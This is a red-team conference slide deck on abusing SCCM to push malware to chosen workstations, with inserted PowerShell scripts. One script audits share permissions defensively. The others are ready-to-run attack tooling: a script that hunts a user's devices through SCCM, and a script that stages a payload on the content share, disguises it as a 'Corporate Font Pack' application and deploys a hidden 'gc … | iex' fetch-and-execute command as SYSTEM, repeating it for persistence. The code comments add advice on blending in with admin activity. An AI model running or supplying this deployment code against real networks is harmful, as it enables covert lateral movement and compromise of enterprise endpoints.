Red Team Upgrades: Using SCCM for Malware Deployment

Matt Nelson - Veris Group's Adaptive Threat Division

1. Red Team Upgrades: Using SCCM for Malware Deployment
2. @enigma0x3
❖ Penetration Tester and Red Teamer for the Adaptive Threat Division (ATD) of Veris Group
❖ Active developer on the PowerShell Empire project
❖ Offensive PowerShell advocate
❖ 2nd time speaking!
❖ This con is probably older than I am
❖ Indiana corn farmer turned h4x0r (not really)

3. What this is...
❖ What SCCM is and how some admins fail at securing it
❖ Ways to abuse Microsoft's System Center Configuration Manager (SCCM) for targeted network compromise
  ➢ I'm going to cover targeted, strategic use as opposed to mass pwnage

4. Setting the Stage
❖ This talk assumes you have RDP access to an SCCM server
❖ This talk is focused on abusing SCCM for lateral movement/persistence in a targeted manner, not on obtaining access to SCCM
❖ No, having access to SCCM does not mean you own the enterprise
❖ If you administer SCCM as a domain admin, you fail.
5. What is SCCM?
❖ Platform for distributing packages/applications to clients
❖ Packages, applications and install scripts are hosted on the SCCM server
❖ Set up and maintained via an agent/server architecture
❖ Consists of a central site server with distribution points
  ➢ Agents check in to the server periodically to obtain new packages/applications
❖ Basically acts as an internal RAT/C2

6. SCCM in the enterprise
❖ 1 central site server with multiple distribution points
❖ Typically managed via controlled groups
  ➢ e.g. "SCCM Admins" in AD
❖ Typically set up/configured using a service account to run the application/push updates
❖ Application contents (*cough, cough, install scripts and notes*) are hosted on a publicly available share
❖ Admins gonna admin
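The content source share is the first thing to check, because anyone who can write there can replace an install script that every client will run. The PowerShell below is an added example, not from the talk: it audits both the SMB share permissions and the NTFS permissions of the content source share for broad principals that hold write access. It assumes it runs on the server hosting the share, a share named sccmsource (the placeholder name slide 12 uses), and the SmbShare module (Windows Server 2012 or later).

```powershell
# Added example (not from the talk): flag over-broad write access on the SCCM
# content source share. Assumes the script runs on the server that hosts the
# share, the share is called "sccmsource" (placeholder from slide 12), and the
# SmbShare module is present (Windows Server 2012+).
function Test-SccmSourceShareExposure {
    param(
        [string]$ShareName = 'sccmsource',
        # Principals that should never be able to change package source content
        [string[]]$BroadPrincipals = @('Everyone', 'NT AUTHORITY\Authenticated Users',
                                        'BUILTIN\Users', 'NT AUTHORITY\INTERACTIVE',
                                        'Domain Users')
    )

    $share    = Get-SmbShare -Name $ShareName -ErrorAction Stop
    $findings = @()

    # 1. Share-level (SMB) permissions: Change or Full is enough to swap scripts
    foreach ($ace in Get-SmbShareAccess -Name $ShareName) {
        $account = $ace.AccountName -replace '^.*\\', ''     # strip domain prefix for matching
        if ($ace.AccessControlType -eq 'Allow' -and
            $ace.AccessRight -in @('Change', 'Full') -and
            ($ace.AccountName -in $BroadPrincipals -or $account -in $BroadPrincipals)) {
            $findings += [pscustomobject]@{
                Layer     = 'Share'
                Principal = $ace.AccountName
                Rights    = $ace.AccessRight
            }
        }
    }

    # 2. NTFS permissions on the folder behind the share
    $writeBits = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl
    foreach ($ace in (Get-Acl -Path $share.Path).Access) {
        $id      = $ace.IdentityReference.Value
        $account = $id -replace '^.*\\', ''
        if ($ace.AccessControlType -eq 'Allow' -and
            ([int]$ace.FileSystemRights -band [int]$writeBits) -ne 0 -and
            ($id -in $BroadPrincipals -or $account -in $BroadPrincipals)) {
            $findings += [pscustomobject]@{
                Layer     = 'NTFS'
                Principal = $id
                Rights    = $ace.FileSystemRights
            }
        }
    }
    return $findings
}

# A principal needs write at BOTH layers to modify content through the share;
# a hit at only one layer is still worth fixing.
Test-SccmSourceShareExposure | Format-Table -AutoSize
```

Effective access over SMB is the intersection of the share ACL and the NTFS ACL, so a finding at both layers for the same principal is the case that matters; local access to the server bypasses the share layer entirely, which is why the NTFS check is included.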
7. Right Click Tools
❖ Add-on that can be installed to assist in client management tasks
❖ Should be installed on a client such as an administrative workstation...not on the server
  ➢ Admins install it on the server anyway
❖ Enables full control of managed endpoints

8. Yep...

9. Why use SCCM in Red Teaming?
❖ Manages a ton of distributed clients
  ➢ Take control of the server and you have distributed workstation control
  ➢ SCCM agents are just waiting to run your code
❖ Live off the land
  ➢ Keep your malicious implant count low; use SCCM for very targeted implant distribution
  ➢ Looks like normal day-to-day traffic/activity
  ➢ To limit the risk of getting caught, behave like an admin, not like a typical adversary

10. Why use SCCM in Red Teaming? (cont)
❖ Allows you to identify and strategically group targets
  ➢ Able to push implants out in a very controlled and surgical manner
❖ Also acts as a persistence mechanism
11. Abusing SCCM: Hunting
❖ Some organizations have user->device mapping
  ➢ This allows admins to create specific groups for departments
❖ We can abuse this to hunt for specific users without generating any additional network/domain traffic
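The user->device mapping the slide refers to is User Device Affinity, which the SMS Provider exposes through WMI on the site server. The following PowerShell is an added example, not from the talk: it resolves a user to the devices SCCM associates with them, pulls the last-logon and OS details from the discovery record, and lists the collections each device already belongs to. The queries are answered from the site database, so nothing is sent to the target endpoints and no extra LDAP traffic goes to the domain controllers. Site code P01, the provider being on the local server (the talk assumes an RDP session there) and the user CORP\jdoe are placeholders.

```powershell
# Added example (not from the talk): hunt a user through the SMS Provider's WMI
# namespace instead of touching AD or the endpoints. Placeholders: site code P01,
# provider on the local server, target user CORP\jdoe.
function Find-SccmUserDevices {
    param(
        [Parameter(Mandatory)][string]$UserName,   # domain\user as SCCM records it
        [string]$SiteCode   = 'P01',
        [string]$SiteServer = $env:COMPUTERNAME
    )
    $ns = "root\SMS\site_$SiteCode"
    # WQL string literals: backslash and single quote must be escaped
    $u = $UserName.Replace('\', '\\').Replace("'", "''")

    # User Device Affinity relationships (explicit, or auto-derived from logon usage)
    $rels = Get-WmiObject -ComputerName $SiteServer -Namespace $ns -Query `
        "SELECT ResourceName, UniqueUserName, IsActive FROM SMS_UserMachineRelationship WHERE UniqueUserName = '$u'"

    foreach ($r in $rels) {
        $name = $r.ResourceName.Replace("'", "''")
        # Discovery record: last logon and OS, to pick the machine actually in use
        $sys = Get-WmiObject -ComputerName $SiteServer -Namespace $ns -Query `
            "SELECT LastLogonUserName, OperatingSystemNameandVersion, IPAddresses FROM SMS_R_System WHERE Name = '$name'"
        # Collections the device is already in: an existing group you can deploy to
        $cols = Get-WmiObject -ComputerName $SiteServer -Namespace $ns -Query `
            "SELECT CollectionID FROM SMS_FullCollectionMembership WHERE Name = '$name'"

        [pscustomobject]@{
            User        = $r.UniqueUserName
            Device      = $r.ResourceName
            Active      = [bool]$r.IsActive
            LastLogon   = $sys.LastLogonUserName
            OS          = $sys.OperatingSystemNameandVersion
            IP          = (@($sys.IPAddresses) -join ', ')
            Collections = (@($cols.CollectionID) -join ', ')
        }
    }
}

Find-SccmUserDevices -UserName 'CORP\jdoe' | Format-Table -AutoSize
```

WQL string comparisons are case-insensitive, so the casing SCCM stored for the user name does not matter. Querying the provider requires SMS Provider rights for the session you are in, which the talk's starting assumption (RDP on the SCCM server as an admin) covers.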
12. Abusing SCCM: Compromise
❖ Create an application/package that utilizes PowerShell for payload delivery and execution
❖ Do so by creating a PowerShell payload and placing it on the public share SCCM uses (typically something like sccmsource)

13. Abusing SCCM: Compromise
❖ Create a script installer application to fetch and execute your payload
  ➢ cmd.exe /c "powershell.exe -c "gc \\serverName\sharedFolder\ApplicationFolder\payload.txt | iex""
❖ Deploy the application to your target group and wait for the SCCM agents to check in
  ➢ Payload is fetched over UNC and runs in memory
❖ More here:
  ➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/
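Slides 12 and 13 are one procedure: stage the payload on the content share, wrap the one-liner in a script deployment type, deploy it to the target collection. The PowerShell below is an added example, not from the talk, that drives that procedure from the ConfigurationManager module on the site server. Site code P01, server SCCM01, the share \\SCCM01\sccmsource, the collection name and the application name are placeholders; the cmdlet names and parameters are those of the current-branch module (older 2012 R2 releases used Start-CMApplicationDeployment instead of New-CMApplicationDeployment), so check Get-Help on your version. Two points the slide leaves implicit: with the deployment type set to install for system, the client runs the command as Local System and reads the UNC path with the computer account, so the share must be readable by domain computers; and the detection script decides whether the install runs once or on every evaluation cycle.

```powershell
# Added example (not from the talk): slides 12-13 driven from the
# ConfigurationManager module on the site server. Placeholders: site code P01,
# server SCCM01, content share \\SCCM01\sccmsource, collection "Finance Workstations".
$appName    = 'Corporate Font Pack'                  # bland name that reads like admin work
$source     = '\\SCCM01\sccmsource\FontPack'         # folder on the existing content share
$payload    = "$source\payload.txt"                  # PowerShell text the client reads over UNC
$collection = 'Finance Workstations'                 # target group found while hunting
$dp         = 'SCCM01.corp.local'                    # distribution point FQDN

# 1. Stage the payload. Replace the placeholder with your launcher text; the
#    client only reads it and pipes it to iex, nothing is written on the target.
$launcherText = '# <PowerShell stager goes here>'
New-Item -ItemType Directory -Path $source -Force | Out-Null
Set-Content -Path $payload -Value $launcherText

# 2. Install command in the shape the slide uses. cmd /c strips only the outermost
#    pair of quotes, so the inner pair survives for powershell.exe -c.
$installCmd = "cmd.exe /c `"powershell.exe -w hidden -c `"gc $payload | iex`"`""

# 3. Detection script: reports "installed" only if a flag file exists. The payload
#    never creates it, so the client re-runs the install on every evaluation cycle,
#    which is the persistence slide 10 mentions. Have the payload create the flag
#    for a one-shot run instead.
$detect = 'if (Test-Path "$env:ProgramData\FontPack\installed.flag") { Write-Output "installed" }'

Import-Module "$env:SMS_ADMIN_UI_PATH\..\ConfigurationManager.psd1"
Set-Location 'P01:'                                  # site PSDrive created by the module

New-CMApplication -Name $appName | Out-Null
Add-CMScriptDeploymentType -ApplicationName $appName -DeploymentTypeName 'Install' `
    -InstallCommand $installCmd -ContentLocation $source `
    -ScriptLanguage PowerShell -ScriptText $detect `
    -InstallationBehaviorType InstallForSystem | Out-Null   # runs as SYSTEM on the client

# 4. Push content to the DP and deploy as Required; clients act on it at their
#    next policy poll (the client default is every 60 minutes).
Start-CMContentDistribution -ApplicationName $appName -DistributionPointName $dp
New-CMApplicationDeployment -Name $appName -CollectionName $collection `
    -DeployAction Install -DeployPurpose Required | Out-Null
```

Everything this does is also what a legitimate application deployment looks like in the console and in the site logs, which is the "behave like an admin" point of slide 9; the differences a defender can key on are a new application created outside the change window, a content source folder that holds only a .txt file, and an install command whose program is powershell.exe reading from a UNC path.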
14. Questions and Contact
❖ Feel free to hit me up!
❖ enigma0x3 [at] gmail [dot] com
❖ @enigma0x3 on Twitter and Github
❖ enigma0x3 on Freenode: #psempire
❖ Blog: enigma0x3.wordpress.com

15. References
❖ https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf
❖ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-compromise-with-sccm/